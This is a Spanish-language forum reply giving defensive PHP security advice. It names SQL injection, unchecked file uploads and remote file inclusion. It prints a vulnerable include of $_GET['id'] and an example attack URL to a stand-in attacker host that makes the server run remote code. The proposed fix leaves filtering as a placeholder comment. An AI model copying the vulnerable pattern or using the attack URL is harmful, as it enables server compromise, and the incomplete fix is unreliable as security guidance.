Ver Mensaje Individual
  #4 (permalink)  
Antiguo 01/01/2010, 17:30
Avatar de pato12
pato12
 
Fecha de Ingreso: septiembre-2007
Ubicación: Salta
Mensajes: 1.620
Antigüedad: 17 años, 4 meses
Puntos: 101
Respuesta: Seguridad php que no sea por sql

Bueno, hay muchos metodos de hackeo XD
- El de injecsion SQL.. (ya lo deves saber :p)

- El de subir archivos... si no verificas bien los datos que el usuario sube, te pueden meter algun virus o un archivo .php y lo ejecutan xD

- El del get (o modulos)... a mi me hackearon 2 veses por ese metodo, mira te explico. Si haces asi para tus modulos (como solia hacer yo):
Código PHP:
Ver original
  1. $id=$_GET['id'];
  2. include("{$id}.php");
entonces, alguien hizo: index.php?id=http://www.web_que_ataca.com/archivo_para_infectar
y se va a ejecutar en mi servidor. Asi me infectaron todos mis archivos XD
por ese es bueno poner asi:
Código PHP:
Ver original
  1. $id=$_GET['id']; // Algunos filtros aqui....
  2. if(file_exists("./modulos/{$id}.php"))
  3. include("./modulos/{$id}.php");
  4. else
  5. die('El modulo no existe!..');
y otra cosa... no uses $_GET[ALGO AQUI] o $_POST[ALGO AQUI]... si no gurdalas en una variable y filtradas.

Despues deven aver otro metodos de hackeo, pero no conosco :p
Suerte
Salu2
__________________
Half Music - www.halfmusic.com